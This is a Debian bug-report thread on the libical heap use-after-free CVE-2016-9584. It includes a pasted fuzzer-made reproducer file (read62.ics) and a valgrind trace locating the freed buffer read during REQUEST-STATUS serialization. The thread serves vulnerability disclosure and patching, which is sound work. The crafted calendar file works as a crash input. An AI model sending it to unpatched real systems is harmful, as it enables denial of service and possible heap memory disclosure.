Bug#852034: libical: CVE-2016-9584: heap use-after-free
Hi Since it looks that http://www.openwall.com/lists/oss-security/2017/01/20/16 it's fine to attach the reproducer, attached is the original read62.ics from Augustin Mista. Regards, Salvatore BEGIN:VCALENDAR VERSION;a=;b="a","a";c="a","b":2.1 PRODID:b CALSCALE:c b;b=;b="a";a=: BEGIN:VTIMEZONE TZID;b="c","c";a="c","c":a LAST-MODIFIED:18640512T154526Z TZURL;b=;b=:×YÌw b;b="a": c;a="a","c";b="a": c: c: END:VTIMEZONE BEGIN:VEVENT DTSTAMP:18640509T123415Z UID:a CLASS;a=:PRIVATE GEO;c=:5.243332;-30.705524 LAST-MODIFIED:18640509T001303Z LOCATION;LANGUAGE="a";c="b","a":c ORGANIZER;DIR="3¥//×";SENT-BY="+//+GvF»";LANGUAGE="b";a="a":w//mºÃ PRIORITY:-3 SEQUENCE:-3 STATUS:CONFIRMED SUMMARY;ALTREP="h//o`R&^";LANGUAGE="c";b=;a="a","b":b TRANSP;a="a","b":TRANSPARENT URL;a=;a="b","c":H_õGD RECURRENCE-ID:18640510T142133 RRULE:FREQ=MINUTELY;BYSECOND=0,0;BYMINUTE=0;BYHOUR=0,0;BYDAY=0MO;BYMONTHDAY =0;BYYEARDAY=0,0,0;BYMONTH=0,0,0;BYSETPOS=0,0,0;WKST=SU RRULE;a=;c=:FREQ=HOURLY;COUNT=-2;INTERVAL=-2;BYSECOND=0,0;BYMINUTE=0,0;BYHO UR=0;BYDAY=0TH;BYMONTHDAY=0,0,0;BYYEARDAY=0,0;BYMONTH=0,0;WKST=WE RRULE:FREQ=DAILY;BYMINUTE=0,0;BYDAY=MO;BYMONTHDAY=0,0,0;BYYEARDAY=0,0;BYWEE KNO=0,0;BYSETPOS=0,0;WKST=TH RRULE;a=:FREQ=MONTHLY;COUNT=2;INTERVAL=2;BYMINUTE=0,0;BYYEARDAY=0;BYWEEKNO= 0,0;BYSETPOS=0;WKST=WE ATTACH:Nu//M ATTACH;FMTTYPE=application/b;a="c":E// ?OF ATTACH;b=;c=;VALUE=BINARY;ENCODING=BASE64:AAEA ATTENDEE;CUTYPE=RESOURCE;MEMBER=",//;ei ";ROLE="c";RSVP=TRUE;DELEGATED-TO=" L//N";DELEGATED-FROM="//R1","4//|sO"," //o[²";CN="a";DIR="WÍ//|<cm MD";a=;b="c":uK2 ATTENDEE;CUTYPE="c";MEMBER=" //xh5","RÓ//u7";ROLE=OPT-PARTICIPANT;PARTST AT=COMPLETED;RSVP=TRUE;DELEGATED-TO="s//·L w1","®,OÒ";DELEGATED-FROM=" ¤//3"1";SENT-BY="}//!@ ý_¯";CN="b";LANGUAGE="b";a="c","c";b="a"," b":n[//½2¡ CATEGORIES;LANGUAGE="b":a CATEGORIES;LANGUAGE="c":c COMMENT;ALTREP="gi//À?¨3o";c="b";b=:a COMMENT;a="c":c COMMENT;ALTREP="//üÏ]¡";a="b";c="a","a":c EXDATE;VALUE=DATE;a=;a="a": EXDATE;VALUE=DATE;a="a": 
REQUEST-STATUS;c=;a="a","c":0;c;c REQUEST-STATUS;LANGUAGE="a":0.0;a;a RELATED-TO;c="c","b";a=;RELTYPE="b":a RELATED-TO:c RDATE;VALUE=DATE;b="b";a="c","c":18640511 RDATE;VALUE=PERIOD;c=:18640509T110241/PT-1H1M1S BEGIN:VALARM ACTION;c="c","c";b="c":AUDIO TRIGGER;VALUE=DATE-TIME:18640511T160521Z REPEAT:1 DURATION;a=:-P-1W ATTACH;VALUE=BINARY;ENCODING=BASE64: c: END:VALARM BEGIN:VALARM ACTION:DISPLAY TRIGGER:PT1H-1M1S DESCRIPTION;ALTREP="//u";LANGUAGE="b";a=:a REPEAT:1 a;b=: c;c=: END:VALARM BEGIN:VALARM ACTION:EMAIL TRIGGER;a="b";VALUE=DATE-TIME:18640511T010525Z DESCRIPTION;ALTREP="L//";LANGUAGE="c":c SUMMARY;ALTREP="Õ//8";LANGUAGE="c":b ATTENDEE;CUTYPE=RESOURCE;ROLE=NON-PARTICIPANT;PARTSTAT=DELEGATED;RSVP=TRUE; DELEGATED-TO="//v",">s";SENT-BY="â";DIR="//j*"://ñ ATTENDEE;CUTYPE=GROUP;MEMBER="X";PARTSTAT="a";RSVP=TRUE;DELEGATED-TO="//« ","C//lz";DELEGATED-FROM="=//*-F";SENT-BY="h#";DIR="o//Ýl";LANGUAGE="a ":2//tk+ REPEAT:-1 DURATION:P1DT1H-1M-1S ATTACH;a=;VALUE=BINARY;ENCODING=BASE64:AQE= ATTACH;FMTTYPE=video/b;c=;VALUE=BINARY;ENCODING=BASE64:AQ== a;a=: b;b="b": a: END:VALARM b;b="a": b;a="c","c";c="a","c": END:VEVENT BEGIN:VEVENT DTSTAMP;a="a":18640508T112617Z UID;b="b";b="a":b DTSTART;TZID="a";b="b";a=:18640508T060217 CLASS;a="a":CONFIDENTIAL CREATED:18640508T060348Z DESCRIPTION;ALTREP="£";LANGUAGE="c";b="c":b GEO;a="a":-21.932919;0.126901 LAST-MODIFIED;a=:18640507T100353Z ORGANIZER;DIR=" ATTENDEE;CUTYPE="c";ROLE=OPT-PARTICIPANT;DELEGATED-FROM="// ";SENT-BY="cD ü";DIR="P//":O// REPEAT;c="c":-2 DURATION;b=:P0DT-1H-1M0S a;c="c": END:VALARM END:VEVENT BEGIN:VEVENT DTSTAMP;a=:18640508T231357Z UID;b=;c="b","a":a DTSTART;TZID="c";c="c","c";a=:18640507T212203 CLASS;b=:c CREATED;c=:18640507T224453Z DESCRIPTION;ALTREP="//A1r1";a="c","a":c GEO:2.636681;-2.271918 LAST-MODIFIED;c="c","c":18640506T095808Z LOCATION;b="c";b="b","a":b ORGANIZER;CN="a";DIR="VÿF";SENT-BY="c Óï";LANGUAGE="b";b="a";a="a" :t PRIORITY;a="c":0 SEQUENCE:-1 STATUS;a="a","a";b="c":CANCELLED 
TRANSP;b=;a="c":OPAQUE URL;b=;a="a":,//( RRULE;b="b","a":FREQ=MINUTELY;UNTIL=18640510T061434Z;INTERVAL=0;BYSECOND=0, 0;BYMINUTE=0,0;BYHOUR=0;BYDAY=MO,0TU,WE;BYMONTHDAY=0;BYYEARDAY=0,0;BYWEEKN O=0,0,0;BYSETPOS=0,0;WKST=TU RRULE;c="c","b";c="b":FREQ=MONTHLY;INTERVAL=-2;BYSECOND=0,0;BYHOUR=0;BYDAY= 0SA,0WE;BYMONTH=0;BYSETPOS=0,0 RRULE;c="a":FREQ=MONTHLY;BYMINUTE=0,0,0;BYDAY=TH,0FR;BYMONTHDAY=0,0,0;BYWEE KNO=0,0,0;BYMONTH=0,0;BYSETPOS=0;WKST=FR RRULE;c=:FREQ=YEARLY;COUNT=2;INTERVAL=-2;BYSECOND=0,0,0;BYHOUR=0,0,0;BYDAY= 0SA,TU,TH;BYMONTHDAY=0,0,0;BYYEARDAY=0,0;BYWEEKNO=0,0;BYMONTH=0,0;BYSETPOS =0 ATTACH;FMTTYPE=c/b;b=;VALUE=BINARY;ENCODING=BASE64:AQA= ATTENDEE;CUTYPE=GROUP;MEMBER="eú//#åW'n","§ //[áêl4j";RSVP=TRUE;DELE GATED-TO="3\¾=";SENT-BY="_//V";CN="a";DIR="x//QZ:,";LANGUAGE="c";c="a" ,"a";c=://!g ATTENDEE;CUTYPE=ROOM;MEMBER="//zv^";ROLE=NON-PARTICIPANT;PARTSTAT=ACCEPTED;
Bug#852034: libical: CVE-2016-9584: heap use-after-free
Source: libical Version: 1.0-1.3 Severity: important Tags: security upstream Hi, the following vulnerability was published for libical. CVE-2016-9584[0]: | libical allows remote attackers to cause a denial of service | (use-after-free) and possibly read heap memory via a crafted ics file. The SuSE bugzilla entry contains a helper parser which can be used to trigger the issue with the read62.ics provided by Agustin Mista (the file is not public yet and currently has to be requested from Agustin Mista; ideally the reporter would publish it). With that input the issue is reproducible under valgrind with both 1.0-1.3 and 2.0.0-0.5. The trace below shows the buffer being freed in icalparser_add_line and later read from icalreqstattype_as_string_r while the parsed component is serialized via icalcomponent_as_ical_string, i.e. a dangling pointer survives parsing into a REQUEST-STATUS value; the invalid reads land inside a freed 66-byte block, which matches the "possibly read heap memory" part of the CVE text. ==956== Memcheck, a memory error detector ==956== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al. ==956== Using Valgrind-3.12.0 and LibVEX; rerun with -h for copyright info ==956== Command: ./icaltestparser ./read62.ics ==956== ==956== Invalid read of size 1 ==956==at 0x4C2EDA2: strlen (vg_replace_strmem.c:454) ==956==by 0x50F3DA2: vfprintf (vfprintf.c:1637) ==956==by 0x51A1975: __vsnprintf_chk (vsnprintf_chk.c:63) ==956==by 0x51A18D7: __snprintf_chk (snprintf_chk.c:34) ==956==by 0x4E7D66A: icalreqstattype_as_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x4E7E559: icalvalue_as_ical_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x4E7186A: icalproperty_as_ical_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x4E6AA67: icalcomponent_as_ical_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x4E6AAB7: icalcomponent_as_ical_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x4E6AB75: icalcomponent_as_ical_string (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x108B95: main (icaltestparser.c:117) ==956== Address 0x849c2a4 is 4 bytes inside a block of size 66 free'd ==956==at 0x4C2CDDB: free (vg_replace_malloc.c:530) ==956==by 0x4E70059: icalparser_add_line (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x108B7E: 
main (icaltestparser.c:112) ==956== Block was alloc'd at ==956==at 0x4C2DBC5: calloc (vg_replace_malloc.c:711) ==956==by 0x4E6E1AD: icalmemory_new_buffer (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x4E6F165: ??? (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x4E700A4: icalparser_add_line (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x108B7E: main (icaltestparser.c:112) ==956== ==956== Invalid read of size 1 ==956==at 0x4C2EDB4: strlen (vg_replace_strmem.c:454) ==956==by 0x50F3DA2: vfprintf (vfprintf.c:1637) ==956==by 0x51A1975: __vsnprintf_chk (vsnprintf_chk.c:63) ==956==by 0x51A18D7: __snprintf_chk (snprintf_chk.c:34) ==956==by 0x4E7D66A: icalreqstattype_as_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x4E7E559: icalvalue_as_ical_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x4E7186A: icalproperty_as_ical_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x4E6AA67: icalcomponent_as_ical_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x4E6AAB7: icalcomponent_as_ical_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x4E6AB75: icalcomponent_as_ical_string (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x108B95: main (icaltestparser.c:117) ==956== Address 0x849c2a5 is 5 bytes inside a block of size 66 free'd ==956==at 0x4C2CDDB: free (vg_replace_malloc.c:530) ==956==by 0x4E70059: icalparser_add_line (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x108B7E: main (icaltestparser.c:112) ==956== Block was alloc'd at ==956==at 0x4C2DBC5: calloc (vg_replace_malloc.c:711) ==956==by 0x4E6E1AD: icalmemory_new_buffer (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x4E6F165: ??? 
(in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x4E700A4: icalparser_add_line (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x108B7E: main (icaltestparser.c:112) ==956== ==956== Invalid read of size 1 ==956==at 0x4C330A8: __GI_mempcpy (vg_replace_strmem.c:1518) ==956==by 0x511FBFD: _IO_default_xsputn (genops.c:438) ==956==by 0x50F3BDA: vfprintf (vfprintf.c:1637) ==956==by 0x51A1975: __vsnprintf_chk (vsnprintf_chk.c:63) ==956==by 0x51A18D7: __snprintf_chk (snprintf_chk.c:34) ==956==by 0x4E7D66A: icalreqstattype_as_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x4E7E559: icalvalue_as_ical_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x4E7186A: icalproperty_as_ical_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x4E6AA67: icalcomponent_as_ical_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by 0x4E6AAB7: icalcomponent_as_ical_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0) ==956==by